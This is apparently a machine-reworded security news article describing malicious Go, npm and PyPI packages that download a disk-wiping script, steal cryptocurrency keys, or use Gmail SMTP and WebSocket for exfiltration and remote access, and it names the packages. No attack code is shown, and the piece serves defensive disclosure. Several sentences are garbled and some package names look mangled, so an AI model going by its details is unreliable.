Cybersecurity researchers have discovered three malicious GO modules containing obfuscated code to obtain the next stepped payload that can irreparably overwrite the primary disk of a Linux system and make it untuneable.
The names of the packages are listed below –
github[.]com/truthfulpharm/prototransform github[.]com/blankloggia/go-mcp github[.]com/Steelpoor/tlsproxy
“Even though it looked legal, these modules contained highly obfuscated code designed to retrieve and run remote payloads,” said Socket researcher Kush Pandya.
The packages are designed to check if the operating system they are running on is Linux, and in that case they use WGET to retrieve the next stage payload from the remote server.
The payload is a destructive shell script that overwrites the entire primary disk (“/dev/sda”) with zeros, effectively preventing the machine from starting.
“This destructive method ensures that data recovery tools and forensic processes cannot recover data, as this is directly and irreversibly overwrites,” Pandya said.
“This malicious script highlights the extreme dangers posed by modern supply chain attacks that can completely cripple targeted Linux servers or developer environments and turn seemingly reliable code into a catastrophic threat.”
This disclosure includes mnemonic seed phrases and private cryptocurrency keys, as multiple malicious NPM packages have been identified in the registry, and the ability to steal data that is sensitive to exfiltrate. Here is a list of packages identified by Socket, Sonatype, and Fortinet –
crypto-encrypt-ts react-native-scrollpageviewtest Bankingbundleserv buttonfactoryserv-paypal compliancereadsereadserserpal-paypal payapal payapal payanpaypal userbridge-paypal userrelationship-paypal-paypal
Malware-covered packages targeting cryptocurrency wallets have also been discovered in the Python Package Index (PYPI) repository (Web3x and hereWalletbot). These packages have been collectively referred to over 6,800 times since their release in 2024.
We found that another set of seven PYPI packages utilize Gmail’s SMTP server and WebSocket for data removal and remote command execution to avoid detection. The deleted packages are: –
CFC-BSB (2,913 downloads) coffin2022 (6,571 downloads) coffin-codes-2022 (18,126 downloads) coffin-codes-net (6,144 downloads) coffin-codes-net2 (6,238 downloads) coffin-codes-pro (9,012 downloads) coffin-grave (6,544)
The package signs in to the service’s SMTP server using hardcoded Gmail account credentials and sends a message to another Gmail address to indicate successful compromise. It then establishes a WebSocket connection to establish a two-way communication channel with the attacker.
Threat actors are using trust related to Gmail domains (“smtp.gmail[.]com “) and the fact that corporate proxy and endpoint protection systems are unlikely to flag them as suspicious, making it stealth and reliable.
Apart from the rest, CFC-BSB, which does not have Gmail-related features but has built-in WebSocket logic that makes remote access easier, is CFC-BSB.
To mitigate the risk poses from such supply chain threats, developers are encouraged to verify the reliability of their packages by checking publisher history and GitHub repository links. Periodically audit dependencies. Enforce strict access control for private keys.
“Beware of extraordinary outbound connections, especially SMTP traffic, as attackers can use legitimate services like Gmail to steal sensitive data,” said Olivia Brown, a Socket researcher. “Don’t trust the package just because it has been around for more than a few years without knocking it down.”
Source link
